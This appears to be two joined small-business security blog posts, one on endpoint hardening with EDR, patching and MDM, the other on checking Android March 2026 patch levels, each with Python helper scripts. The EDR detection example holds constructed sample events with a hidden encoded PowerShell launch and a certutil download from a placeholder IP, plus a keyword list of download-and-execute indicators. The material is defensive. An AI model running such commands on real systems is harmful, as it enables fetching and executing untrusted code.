TL;DR
Attackers get into most businesses through the laptops, desktops, and phones staff use every day, not through the data centre. Deploy EDR on every endpoint, automate patching so that critical or actively exploited fixes land within 48 hours, and enforce MDM with disk encryption and remote wipe. All of this maps onto the ASD Essential Eight and the CIS Benchmarks.
Why Endpoints Are Your Biggest Risk
Attackers do not break into data centres first. They target the laptops, desktops, and smartphones your staff use every day. IBM Security's 2024 Cost of a Data Breach report put the global average cost of a breach at USD 4.88 million (an average across all breach types, not endpoint-caused breaches alone). For an Australian SMB, the recovery cost and downtime can be fatal. The good news: most of these entry points can be locked down in a single week.
Deploy EDR or XDR on Every Endpoint
EDR (Endpoint Detection and Response) monitors device behaviour in real time and can isolate a host from the network. XDR (Extended Detection and Response) adds identity, email, and cloud telemetry so one investigation can follow an attacker from a phishing email to a sign-in to a process on a laptop. For a typical SMB, EDR is a sufficient starting point; revisit XDR once someone is actually working the alert queue and needs the extra context.
Specific tools to evaluate this week:
- Microsoft Defender for Endpoint — included in Microsoft 365 Business Premium or approximately $3 per user per month standalone. Best for Windows-heavy shops already in the Microsoft ecosystem.
- CrowdStrike Falcon Go — cloud-native, roughly $8 per endpoint per month. Strong threat intelligence and managed response options.
- SentinelOne Singularity — autonomous rollback and Storyline™ forensics, generally $10–$15 per endpoint per month.
Action plan: Install agents across all endpoints by end of day two. Enable tamper protection so that neither users nor malware running as a local administrator can disable or uninstall the agent. Route alerts to a dedicated admin mailbox or SIEM, and make sure somebody owns that queue; an unread alert is the same as no alert. Note that EDR is not itself one of the Essential Eight, but the model's higher maturity levels require centralised event logging and timely analysis of those logs to detect cyber security events, and an EDR feeding a SIEM is the practical way an SMB meets that.
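What "monitors device behaviour" means in practice is a rule like the one below, added here as an example (it is not this page's code and not any EDR vendor's detection logic): an Office application spawning a script host, which is the Word-to-PowerShell pattern this page's FAQ uses. The events are constructed in the shape of Sysmon Event ID 1 (process creation) fields; hostnames, users, and command lines are made up. The severity goes up when the command line carries the encoded, hidden, or download-and-execute flags malicious macros typically use.

```python
"""Behavioural detection rule of the kind an EDR agent or SIEM applies.
Added example: not the page's code and not any vendor's logic.
Events are constructed in the shape of Sysmon Event ID 1 (process creation)
fields: Computer, User, ParentImage, Image, CommandLine."""
from pathlib import PureWindowsPath
from typing import Optional

# Office processes that should almost never launch a script host directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and living-off-the-land binaries commonly spawned by malicious macros.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Command-line fragments that raise severity: encoded/hidden PowerShell, in-memory download-and-run.
SUSPICIOUS_ARGS = ("-enc", "-w hidden", "-windowstyle hidden", "downloadstring",
                   "invoke-expression", "iex ", "frombase64string")


def image_name(path: str) -> str:
    """Reduce 'C:\\Windows\\System32\\CMD.EXE' (any case) to 'cmd.exe' for set lookup."""
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> Optional[dict]:
    """Return an alert when an Office parent spawns a script host, else None."""
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "")
    hits = [arg for arg in SUSPICIOUS_ARGS if arg in cmd.lower()]
    return {
        "host": event.get("Computer", "?"),
        "user": event.get("User", "?"),
        "rule": "office-app-spawns-script-host",
        "severity": "high" if hits else "medium",
        "parent": parent,
        "child": child,
        "indicators": hits,
        "command_line": cmd,
    }


def scan(events) -> list:
    """Run the rule over a batch of events and keep only the alerts."""
    return [alert for alert in map(evaluate, events) if alert]


# Constructed sample events (hostnames, users and paths are made up).
SAMPLE_EVENTS = [
    {   # macro in an "invoice" document launching hidden, base64-encoded PowerShell
        "Computer": "LT-FINANCE-02", "User": "CORP\\sarah",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
    },
    {   # an administrator running a script from Explorer: normal, no alert
        "Computer": "LT-IT-01", "User": "CORP\\admin.jo",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1",
    },
    {   # spreadsheet launching cmd.exe; nothing on the indicator list, so medium
        "Computer": "LT-SALES-07", "User": "CORP\\dave",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c certutil -urlcache -f http://203.0.113.10/x.txt x.txt",
    },
    {   # Outlook opening a PDF viewer: the child is not a script host
        "Computer": "LT-SALES-07", "User": "CORP\\dave",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "Image": r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
        "CommandLine": "",
    },
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["host"], alert["parent"], "->",
              alert["child"], alert["indicators"])
```

The third event is the reason a "medium" tier exists: certutil fetching a file from the internet is hostile, but it is not on this short indicator list, so the parent/child relationship alone carries the alert. Treat the indicator list as a starting point and grow it from what your own alerts show.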
Automate Patch Management Before Next Tuesday
The ASD Essential Eight has two controls for this: patch applications and patch operating systems. A good working rule is to patch within 48 hours when the vendor rates a vulnerability critical or a working exploit exists, and otherwise within two weeks. The exact timeframes in the maturity model vary by maturity level and by whether the asset is internet-facing, so confirm them against the current version. Manual patching fails not because people are careless but because nobody's calendar reminds them on the day an exploit goes public.
Tools to automate it:
- Windows Update for Business — free, built into Windows Pro/Enterprise. Configure update rings via Group Policy or Intune.
- Automox — cloud-native cross-platform patching, roughly $4 per endpoint per month.
- PDQ Deploy — on-prem Windows patching and software deployment, around $500 per year per administrator license.
Action plan: Enable automatic OS updates. Patch browsers, PDF readers, and Office first; they are the applications attackers most often target with malicious documents and drive-by downloads. Keep a test ring of two devices that receive updates a day ahead of everyone else so a bad update surfaces there first. This maps directly to the Essential Eight's patch applications and patch operating systems controls, including their requirement that applications the vendor no longer supports are removed rather than left in place.
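A patching tool applies updates; it does not, on its own, tell you which devices have blown the 48-hour or 14-day window. The tracker below is an added example (not this page's code and not any patching vendor's) that does that arithmetic over a fleet inventory of the kind an RMM or MDM exports. The SLA table, the advisories, the product names, and the version numbers are all constructed placeholders; set the timeframes from the Essential Eight maturity level you are actually working to.

```python
"""Patch-SLA tracker for the rule above: 48 hours when the vendor rates a
vulnerability critical or a working exploit exists, 14 days otherwise.
Added example, not the page's or any patching vendor's code. The SLA table,
the advisories and the fleet inventory are all constructed; product names and
version numbers are placeholders."""
from datetime import datetime, timedelta

# Assumed SLA table; adjust to the maturity level and asset class you are working to.
SLA = {"urgent": timedelta(hours=48), "routine": timedelta(days=14)}


def parse_version(text: str) -> tuple:
    """'120.0.3' -> (120, 0, 3) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def is_urgent(advisory: dict) -> bool:
    return advisory["critical"] or advisory["exploited"]


def deadline(advisory: dict) -> datetime:
    """When the fix must be installed, counted from the vendor's release time."""
    return advisory["released"] + SLA["urgent" if is_urgent(advisory) else "routine"]


def assess(installed: str, advisory: dict, now: datetime) -> tuple:
    """Return (status, days_overdue) for one installed version against one advisory."""
    if parse_version(installed) >= parse_version(advisory["fixed_version"]):
        return "patched", 0
    due = deadline(advisory)
    if now <= due:
        return "due", 0
    return "overdue", (now - due).days


def report(fleet: list, advisories: dict, now: datetime) -> list:
    """One row per (device, application) pair that has an advisory; overdue rows first."""
    rows = []
    for device in fleet:
        for app, installed in device["apps"].items():
            advisory = advisories.get(app)
            if advisory is None:
                continue  # no open advisory for this application
            status, late = assess(installed, advisory, now)
            rows.append({"device": device["name"], "app": app, "installed": installed,
                         "fixed": advisory["fixed_version"], "urgent": is_urgent(advisory),
                         "due": deadline(advisory), "status": status, "days_overdue": late})
    order = {"overdue": 0, "due": 1, "patched": 2}
    return sorted(rows, key=lambda r: (order[r["status"]], -r["days_overdue"], r["device"]))


# Constructed advisories: product names and versions are placeholders.
ADVISORIES = {
    "browser":    {"fixed_version": "120.0.3", "released": datetime(2026, 3, 2, 9, 0),
                   "critical": False, "exploited": True},     # exploited in the wild: 48 h
    "pdf_reader": {"fixed_version": "24.1.0", "released": datetime(2026, 2, 20),
                   "critical": False, "exploited": False},    # routine: 14 days
    "office":     {"fixed_version": "16.0.18000.1", "released": datetime(2026, 3, 9),
                   "critical": False, "exploited": False},
}

# Constructed fleet inventory, as an RMM or MDM export might provide it.
FLEET = [
    {"name": "laptop-01", "apps": {"browser": "120.0.3", "pdf_reader": "24.1.0"}},
    {"name": "laptop-02", "apps": {"browser": "120.0.1", "pdf_reader": "24.0.5"}},
    {"name": "laptop-03", "apps": {"browser": "120.0.3", "pdf_reader": "23.9.1",
                                   "office": "16.0.17900.0"}},
    {"name": "phone-07",  "apps": {"browser": "119.9.0"}},
]
NOW = datetime(2026, 3, 10, 10, 0)

if __name__ == "__main__":
    for row in report(FLEET, ADVISORIES, NOW):
        print(f"{row['status']:8} {row['device']:10} {row['app']:11} "
              f"{row['installed']} -> {row['fixed']}  due {row['due']:%Y-%m-%d %H:%M}  "
              f"{row['days_overdue']}d late")
```

Versions are compared as tuples of integers on purpose: as strings, "120.0.10" sorts before "120.0.9" and a patched device would be reported as vulnerable. The deadline is counted from the vendor's release time, not from when you noticed the advisory, which is what the Essential Eight timeframes are measured against.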
Roll Out MDM for Laptops, Desktops, and Mobile
If a device holds company email or customer data, it must be managed. Mobile Device Management (MDM) enforces encryption, screen locks, strong PINs, remote wipe, and VPN or Wi-Fi profiles.
Tools to evaluate:
- Microsoft Intune — approximately $8.80 per user per month standalone; often bundled with Microsoft 365 Business Premium. Manages Windows, macOS, iOS, and Android.
- Jamf Pro — roughly $4 per Apple device per month. Ideal if your fleet is Mac/iPhone heavy.
Action plan: Enrol every device before Friday. Push a configuration profile that mandates BitLocker (Windows) or FileVault (Mac) encryption, and confirm each device reports back as encrypted rather than assuming the profile applied. Require a PIN of at least six digits; biometrics can be allowed as a convenience on top, but the PIN remains the credential and must not be weakened to accommodate them. For BYOD phones, use an Android work profile or Apple User Enrollment so you can wipe company data without touching personal photos. Disable app sideloading in the work profile to block unofficial APKs.
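Pushing the encryption profile is the easy half; the half that gets skipped is checking the device actually ended up encrypted. The script below is an added example (not this page's code and not any MDM vendor's) that parses what the built-in tools report, `manage-bde -status C:` on Windows and `fdesetup status` on macOS, and fails a device unless the volume is both fully encrypted and actively protected. The tool outputs are constructed in the shape those commands print in an English locale; the hostnames are made up.

```python
"""Verify that the MDM encryption profile actually took effect, by parsing what
the built-in tools report: `manage-bde -status C:` on Windows and
`fdesetup status` on macOS. Added example, not the page's or any MDM vendor's
code. The tool outputs below are constructed in the shape those commands
print (English locale) and the hostnames are made up."""
import re


def field(output: str, name: str) -> str:
    """Value of a 'Name:    value' line in manage-bde output, or '' if absent."""
    m = re.search(rf"^\s*{re.escape(name)}:\s*(.+?)\s*$", output, re.M)
    return m.group(1) if m else ""


def key_protectors(output: str) -> list:
    """Names listed under 'Key Protectors:' (each indented one level deeper)."""
    lines = output.splitlines()
    found = []
    for i, line in enumerate(lines):
        if line.strip() == "Key Protectors:":
            base = len(line) - len(line.lstrip())
            for nxt in lines[i + 1:]:
                if not nxt.strip() or len(nxt) - len(nxt.lstrip()) <= base:
                    break
                found.append(nxt.strip())
            break
    return found


def bitlocker_state(output: str) -> dict:
    """BitLocker counts as enforced only when the volume is fully encrypted AND
    protection is on. A suspended volume (common around firmware updates) still
    says 'Fully Encrypted' but 'Protection Off', with the clear key on disk."""
    conversion = field(output, "Conversion Status")
    protection = field(output, "Protection Status")
    return {
        "encrypted": conversion == "Fully Encrypted",
        "protection_on": protection == "Protection On",
        "method": field(output, "Encryption Method"),
        "key_protectors": key_protectors(output),
        "compliant": conversion == "Fully Encrypted" and protection == "Protection On",
    }


def filevault_on(output: str) -> bool:
    """`fdesetup status` prints 'FileVault is On.' or 'FileVault is Off.' first."""
    return re.search(r"^FileVault is On\.", output, re.M) is not None


def fleet_report(records: list) -> dict:
    """host -> True/False, given each host's platform and captured tool output."""
    result = {}
    for rec in records:
        if rec["platform"] == "windows":
            result[rec["host"]] = bitlocker_state(rec["output"])["compliant"]
        elif rec["platform"] == "macos":
            result[rec["host"]] = filevault_on(rec["output"])
        else:
            result[rec["host"]] = False  # unknown platform: fail closed
    return result


# Constructed outputs in the shape of the real tools.
WIN_OK = """Volume C: [OSDisk]
[OS Volume]

    Size:                 237.00 GB
    BitLocker Version:    2.0
    Conversion Status:    Fully Encrypted
    Percentage Encrypted: 100.0%
    Encryption Method:    XTS-AES 128
    Protection Status:    Protection On
    Lock Status:          Unlocked
    Identification Field: Unknown
    Key Protectors:
        TPM
        Numerical Password
"""
WIN_SUSPENDED = WIN_OK.replace("Protection On", "Protection Off")   # BitLocker suspended
WIN_IN_PROGRESS = (WIN_OK.replace("Fully Encrypted", "Encryption In Progress")
                         .replace("100.0%", "37.0%").replace("Protection On", "Protection Off"))
MAC_ON = "FileVault is On.\n"
MAC_OFF = "FileVault is Off.\nDeferred enablement appears to be active for user 'sarah'.\n"

SAMPLE = [
    {"host": "lt-01", "platform": "windows", "output": WIN_OK},
    {"host": "lt-02", "platform": "windows", "output": WIN_SUSPENDED},
    {"host": "lt-03", "platform": "windows", "output": WIN_IN_PROGRESS},
    {"host": "mb-01", "platform": "macos", "output": MAC_ON},
    {"host": "mb-02", "platform": "macos", "output": MAC_OFF},
]

if __name__ == "__main__":
    for host, ok in fleet_report(SAMPLE).items():
        print(f"{host}: {'compliant' if ok else 'NOT compliant'}")
```

The suspended case (lt-02) is the one that bites: the disk is encrypted, so a naive check passes, but protection is off and the volume key is stored in the clear until someone resumes BitLocker. Note that manage-bde prints localised strings on non-English Windows; for anything beyond a hand-collected export, read the structured `ProtectionStatus` and `VolumeStatus` properties from PowerShell's `Get-BitLockerVolume` instead of scraping text.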
Quick-Win Hardening Checklist for Every Device
Use this checklist alongside the CIS Benchmarks for Windows 11 and macOS (free PDFs from CIS):
Laptops and Desktops
- Remove local admin rights from daily-use accounts.
- Enable host firewall and disable unnecessary services.
- Disable USB autoplay and restrict removable storage if not required.
- Apply CIS Benchmark Level 1 settings—they are practical and do not break business workflows.
- Ensure EDR is installed, updating, and reporting tamper alerts.
Mobile Devices
- Enable Find My Device (Android) or Find My (Apple).
- Enforce OS updates within 14 days via MDM policy.
- Disable Bluetooth and Wi-Fi when not in use on travel devices.
- Restrict cloud backup to approved corporate tenants only.
The laptop items map to the Essential Eight's restrict administrative privileges control and the mobile items to patch operating systems. Round them out with the two Essential Eight controls this checklist does not yet cover: configure Microsoft Office macro settings (block macros in files from the internet and allow only vetted, signed macros) and user application hardening (stop browsers processing Java and web advertisements from the internet, remove unneeded add-ons, and change every default credential attackers love to try).
What It Costs for a 25-Device Fleet
Realistic per-month SMB pricing for 25 endpoints:
- EDR: $75–$375
- MDM: $100–$220 (Intune or Jamf)
- Patching: $0–$100 (WUfB is free; Automox adds cost)
- Total: roughly $175–$695 per month
Context: that is far less than a day of ransomware downtime or the investigation and notification work behind a single Notifiable Data Breaches scheme report to the OAIC.
FAQ
What is the difference between antivirus and EDR? Antivirus scans files for known signatures. EDR monitors behavior in real time—such as PowerShell spawning from a Word document—and can automatically isolate the device before damage spreads.
Can a small business use free tools instead? Microsoft Defender Antivirus is a capable free baseline, but centralized alerting, automated investigation, and MDM enforcement require paid platforms. Free solutions become expensive when you miss an alert at 2 a.m.
How long does a typical rollout take? MDM enrollment can be completed in a few hours via email invites. EDR deployment usually takes one to two days across a 25-device fleet. Patching policies can be live the same day you configure them.
Do we need MDM if staff use personal phones for email? Yes. Use containerized work profiles through Intune or Google Workspace MDM. This isolates corporate email and calendar data and allows remote wipe of the work container without affecting personal photos or apps.
Conclusion
You do not need a six-month security transformation. Pick one layer and execute it this week: deploy EDR to every laptop, enable automated patching on all endpoints, or enroll every mobile device into MDM. Use the ASD Essential Eight as your maturity roadmap and the CIS Benchmarks as your technical standard. Start with the devices that hold customer data and financial access—they are the ones attackers want most.
Ready to close the gaps? Visit consult.lil.business for a free cybersecurity assessment.
References
- Australian Cyber Security Centre — Essential Eight Maturity Model
- Center for Internet Security — CIS Benchmarks
- National Institute of Standards and Technology — Cybersecurity Framework
Your Work Phone Just Became an Unlocked Door — How to Check if It's Been Fixed
Explained Like You're 10
TL;DR
- Google just fixed 129 security holes in Android phones — including one that hackers are already using right now [1]
- If your staff use Android phones to check work email or access business systems, an unpatched phone is like leaving the back door to your business unlocked
- Checking and fixing this takes about 2 minutes per phone
The Hole in Your Phone
Imagine every phone has thousands of tiny windows. Most are nailed shut. Every so often, someone finds a window that isn't — and before it gets fixed, they can squeeze through it to get inside.
That's what a security vulnerability is.
In March 2026, Google found — and fixed — 129 of these unlocked windows in Android phones [1]. That's a lot at once.
Two of them are the most serious:
The one already being used by hackers: There's a flaw in the graphics chip used by many Android phones (made by a company called Qualcomm). Hackers have already figured out how to use this flaw to get inside certain phones [1][2]. Google has confirmed real attacks are happening right now.
The one that needs no tapping or clicking: There's a second flaw so serious that a hacker could break into a phone just because it's connected to the internet — no dodgy link, no suspicious attachment, nothing. Just "phone exists on the internet, phone gets hacked" [1].
Why Your Work Phone Is Your Business's Problem
Here is the part that surprises a lot of business owners.
When Sarah from your team uses her personal Android phone to check her work email or log into your accounting software — her phone is now a door into your business.
It's like if your staff member kept the office Wi-Fi password on a sticky note in their wallet. If someone steals the wallet, they can get into your office. In the same way, if a hacker gets into a phone that's logged into your business systems, they can reach your business data.
Most businesses are really careful about keeping their office computers updated. Very few think about the phones.
The 2-Minute Check
Here is how to check if any phone is protected.
On any Android phone:
- Open Settings
- Scroll down to About Phone
- Tap Android Version (or Software Information on Samsung)
- Look for Android Security Patch Level
If the date shown is 5 March 2026 (2026-03-05) or later: protected.
If it shows 1 March 2026 (2026-03-01): Google's own fixes are in, but fixes from chip makers such as Qualcomm usually ship under the 5 March level, so the phone may still be waiting on the one attackers are using. Check again in a week or two.
If it shows February 2026 or earlier: still at risk. (Update needed)
How to Update
On Android: Settings → System → System Update → Check for Updates (on Samsung: Settings → Software update → Download and install)
If an update is available, install it. Takes 10–15 minutes and a restart.
If no update is available yet: Some phone brands are slower to release Google's patches. If a work phone can't get the March update and it has access to your business systems — it's worth temporarily removing that access until it can be updated. This sounds strict, but it's the same thinking as "don't leave the front door unlocked just because the locksmith is busy."
The Bigger Picture for Your Business
Your business probably has a rule about keeping computers updated. This month is a good reminder that phones need the same treatment.
Here's a simple rule that works well for small businesses:
If a device accesses business systems, it needs to be running the latest security update — or it doesn't get access.
You don't need expensive software for this. You just need to check once a month, the same way you might check the locks before you leave the office.
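For the IT person or consultant who has to do this across a whole fleet rather than one phone at a time, here is the same check as a script. It is an added example, not code from this page or from Google. On a real phone the patch level comes from `adb shell getprop ro.build.version.security_patch` (the same value the Settings screen shows); the levels below are constructed. Two assumptions are built in: the March 2026 bulletin's two patch levels follow the usual pattern (2026-03-01 for the Android framework fixes, 2026-03-05 adding the vendor and chip-maker fixes such as Qualcomm's), and a 14-day grace period after the bulletin, borrowed from the MDM checklist earlier on this page, before the rule above cuts access. Phones whose maker has stopped shipping updates (see the FAQ) are cut off regardless of grace, since they will never catch up.

```python
"""Automates the 'look at the patch level' check and applies the rule:
no current security update, no access to business systems. Added example,
not the page's or Google's code. Real value: `adb shell getprop
ro.build.version.security_patch`; the levels and fleet below are constructed.
Assumed: 2026-03-01 = Android framework fixes, 2026-03-05 = also vendor and
chip-maker fixes; 14-day grace period after the bulletin."""
from datetime import date, timedelta
import re

LEVEL_RE = re.compile(r"^(\d{4})-(\d{2})-(\d{2})$")
FULL_LEVEL = date(2026, 3, 5)      # assumed: the complete March 2026 level
GRACE = timedelta(days=14)         # assumed: time allowed to install after release


def parse_level(text: str):
    """'2026-03-05' -> date; anything else (blank, 'unknown', bad month) -> None."""
    m = LEVEL_RE.match(text.strip())
    if not m:
        return None
    try:
        return date(*(int(g) for g in m.groups()))
    except ValueError:
        return None


def assess(level_text: str, eol: bool = False, today: date = date(2026, 3, 20),
           full_level: date = FULL_LEVEL, grace: timedelta = GRACE) -> dict:
    """Classify one phone's patch level and decide whether it may reach business systems."""
    level = parse_level(level_text)
    in_grace = today <= full_level + grace
    if level is None:
        return {"status": "unknown", "access": False,
                "why": f"patch level {level_text!r} could not be read; treat as unpatched"}
    if level >= full_level:
        return {"status": "protected", "access": True, "why": "on the full patch level or newer"}
    if eol:
        return {"status": "unsupported", "access": False,
                "why": "manufacturer no longer ships updates; this phone will never get the fix"}
    if (level.year, level.month) == (full_level.year, full_level.month):
        status = "framework-only"
        why = "Android framework fixes applied, vendor/chip-maker fixes (the -05 level) still pending"
    else:
        months_behind = (full_level.year - level.year) * 12 + full_level.month - level.month
        status, why = "behind", f"{months_behind} month(s) behind the current bulletin"
    return {"status": status, "access": in_grace,
            "why": why + (" (within grace period)" if in_grace else " (grace period over)")}


def triage(fleet: list, **kwargs) -> list:
    """Phones that should lose access, most sensitive roles first."""
    rows = [dict(phone, **assess(phone["patch_level"], eol=phone.get("eol", False), **kwargs))
            for phone in fleet]
    rows = [r for r in rows if not r["access"]]
    priority = {"finance": 0, "admin": 0, "customer-data": 1, "general": 2}
    return sorted(rows, key=lambda r: priority.get(r["role"], 3))


# Constructed fleet: names, roles and levels are made up.
FLEET = [
    {"owner": "sarah", "role": "finance",       "patch_level": "2026-02-01"},
    {"owner": "jo",    "role": "admin",         "patch_level": "2026-03-05"},
    {"owner": "dave",  "role": "customer-data", "patch_level": "2026-03-01"},
    {"owner": "mei",   "role": "general",       "patch_level": "2025-08-05", "eol": True},
    {"owner": "tom",   "role": "general",       "patch_level": "unknown"},
]

if __name__ == "__main__":
    for row in triage(FLEET):
        print(f"{row['owner']:6} {row['role']:14} {row['status']:14} {row['why']}")
```

An unreadable patch level is deliberately treated as unpatched: a blank or garbled value usually means a heavily customised or very old build, which is exactly the phone you do not want on the accounting system. The role ordering is there because the first phones to chase are the ones with finance, customer data, or admin access, as the FAQ below suggests.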
The Australian Signals Directorate (Australia's cyber safety agency) consistently highlights outdated mobile software as one of the most common ways businesses get compromised [4].
FAQ
What if my phone can't get the update at all? If your phone manufacturer has stopped releasing security updates (usually after 3–5 years for most brands), your phone will never get this fix. If that phone is accessing your business email or systems, consider replacing it, or use a different device for business that can still receive updates. Google Pixel phones (Pixel 8 and later) now receive 7 years of updates, which makes them a solid business choice.
Does this affect iPhones too? No. This is specific to Android phones. iPhones have their own separate security updates, which Apple releases quickly. The same principle applies though: keep your iPhone updated too.
Which phones should I check first? Focus on the ones that access the most sensitive systems first: whoever handles finance, customer data, or admin access. A quick message asking everyone to screenshot their security patch level screen takes 5 minutes for your whole team.
Why were there so many fixes at once? It's not that Android suddenly became a lot more vulnerable; Google bunches up patches and releases them in batches. Some of these fixes were in development for months. The number looks scary, but most are low-severity issues that would be hard to exploit in practice. The two we highlighted are the ones that genuinely need urgent attention.
How often should I check? Once a month is enough. Google publishes its Android security bulletins monthly. Set a reminder on the first Monday of each month to quickly confirm all work-accessed devices are current.
References
[1] Google, "Android Security Bulletin—March 2026," Android Open Source Project, Mar. 2026. [Online]. Available: https://source.android.com/docs/security/bulletin/2026/2026-03-01
[2] The Hacker News, "Google Confirms CVE-2026-21385 in Qualcomm Android Component Exploited," The Hacker News, Mar. 3, 2026. [Online]. Available: https://thehackernews.com/2026/03/google-confirms-cve-2026-21385-in.html
[3] Qualcomm, "March 2026 Security Bulletin," Qualcomm Technologies, Mar. 2026. [Online]. Available: https://docs.qualcomm.com/securitybulletin/march-2026-bulletin.html
[4] Australian Signals Directorate, "ASD Annual Cyber Threat Report 2023-24," Australian Signals Directorate, 2024. [Online]. Available: https://www.cyber.gov.au/about-us/view-all-content/reports-and-statistics/asd-cyber-threat-report-july-2023-june-2024
[5] NIST, "SP 800-124 Rev. 2: Guidelines for Managing the Security of Mobile Devices in the Enterprise," National Institute of Standards and Technology, 2023. [Online]. Available: https://csrc.nist.gov/publications/detail/sp/800-124/rev-2/final
[6] CISA, "Mobile Device Best Practices," Cybersecurity and Infrastructure Security Agency, 2024. [Online]. Available: https://www.cisa.gov/resources-tools/resources/mobile-device-best-practices
[7] IBM Security, "Cost of a Data Breach Report 2025," IBM, 2025. [Online]. Available: https://www.ibm.com/reports/data-breach
[8] Verizon, "2025 Data Breach Investigations Report," Verizon Business, 2025. [Online]. Available: https://www.verizon.com/business/resources/reports/dbir/
Want someone to check whether your business's phones and devices are properly secured? Book a free 30-minute review with lilMONSTER — we'll look at what's accessible and give you a simple checklist to fix the gaps.